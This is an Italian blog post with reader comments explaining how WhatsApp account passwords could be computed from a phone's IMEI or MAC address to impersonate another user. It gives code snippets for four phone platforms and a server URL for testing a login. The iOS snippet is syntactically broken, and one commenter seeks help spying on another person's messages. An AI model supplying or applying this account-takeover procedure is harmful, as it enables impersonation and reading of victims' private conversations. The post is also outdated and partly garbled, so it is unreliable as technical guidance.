','

'); } ?>
Home "" Sicurezza "" WhatsApp Hacked – Impersoniamo un’altra persona

WhatsApp Hacked – Impersoniamo un’altra persona

Come descritto dal blog OverSecurity è stata violata la procedura di autenticazione al noto programma di messaggistica per dispositivi mobili WhatsApp. Infatti l’autenticazione dell’utente durante l’invio o la ricezione dei messaggi è violabile, quindi un estraneo può prendere pieno possesso di un account WhatsApp inviando messaggi e oppure di leggere anche le eventuali risposte.

Ogni utente che vuole inviare un messaggio o verificare se ha dei messaggi da leggere si autentica sui server attraverso una “password” generata automaticamente dal software. La password è però facilmente generabile poiché si basa sul codice IMEI degli Smartphone non Apple o del MAC Address per gli utenti Apple.

 

Generazione della Password per i dispositivi Android:

$imei = “112222223333334″; //  IMEI di esempio
$androidWhatsAppPassword = md5(strrev($imei)); // calcolo della Password (inversione dell’IMEI e generazione del MD5)

Generazione della Password per i dispositivi iOS a cura di Ezio Amodio:

$wlanMAC = “AA:BB:CC:DD:EE:FF”; // WLAN MAC address di esempio
$iphoneWhatsAppPassword = md5($wlanMAC$wlanMAC); // calcolo della Password

Generazione della Password per i dispositivi BlackBerry:

$imei = “112222223333334″; //  IMEI di esempio
$BBWhatsAppPassword = md5(strrev($imei)); // calcolo della Password (inversione dell’IMEI e generazione del MD5)

Generazione della Password per i dispositivi Windows Phone a cura di Ezio Amodio:

$DeviceUniqueID = “112222223333334″ // ID del Dispositivo
$WPWhatsAppPassword = $DeviceUniqueID // calcolo della Password

Per la lettura del vostro ID Dispositivo potete affidarvi all’applicazione gratuita Device Unique Id disponibile nei vari Market Place.

L’username è ancor più semplicemente il vostro numero di cellulare anteposto dal prefisso internazionale senza il simbolo + o il doppio zero (Es. 393481234567).

Si può fare una semplice prova di autenticazione, basterà aprire un qualsiasi browser internet e digitare nella barra degli indirii il seguente URL:

https://r.whatsapp.net/v1/exist.php?cc=$countrycode&in=$phonenumber&udid=$password

Dove bisogna sostituire i campi $countrycode, $phonenumber e $password con i relativi dati;  ovvero il codice paese (per l’Italia è il 39) senza il simbolo + o il doppio zero, il numero di cellulare e la password calcolata secondo le specifiche precedentemente illustrate.

Se tutto andrà per il meglio il vostro Browser vi riporterà la seguente stringa XML:

<exist>

<response status=”ok” result=”393481234567″/>

</exist>

Notate immediatamente che l’esito dello stato è OK il che conferma che avete ottenuto l’accesso al vostro account, se invece la password generata o l’utente non è riconosciuto dal servizio di messaggistica apparirà la dicitura FAIL. Segue sul blog una dimostrazione pratica di una conversazione avvenuta tra diversi utenti, proseguite la lettura sul blog OverSecurity per maggiori dettagli.

FONTI:

OverSecurity

Pagina Articolo

About Vincenzo Curia

Vincenzo Curia
Laureato in Ingegneria Informatica, web developer e fotografo per passione.

8 commenti

  1. nn riesco a mettere la password ad una mia amica x nn far leggere nnt a nessuno

  2. ciao!! vorre fare la prova per vedere se il mio cell è a rischio visto che ho l’ultima versione di whatsapp che dicono che è sicura… però ho un nokia con sistema symbian.. come si calcola la password per i symbian?

  3. Solo una domanda: per il calcolo della pass devo inserire la stringa in php?

  4. Non riesco a capire come generare la password di un Iphone. E’ possibile spiegarlo meglio?

  5. una domanda,vorrei sapere come si fa a generare la password dei dispositivi android,quella formula md5 strrev(imei) dove bisogna metterla?come si applica?è una cosa cui bisogna avere conoscenze particolari?

  6. Ma alla data di oggi che sappiate , isono stati risolti questi problemi di sicurezza.?

  7. Ciao sono interessato a scoprire alcune informazioni su watthap di una persona mi potresti aiutare magari se vuoi in privato ti lascio i miei contatti

Inserisci un commento

Il tuo indirizzo email non sarà pubblicato. Required fields are marked *

*


*

È possibile utilizzare questi tag ed attributi XHTML: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>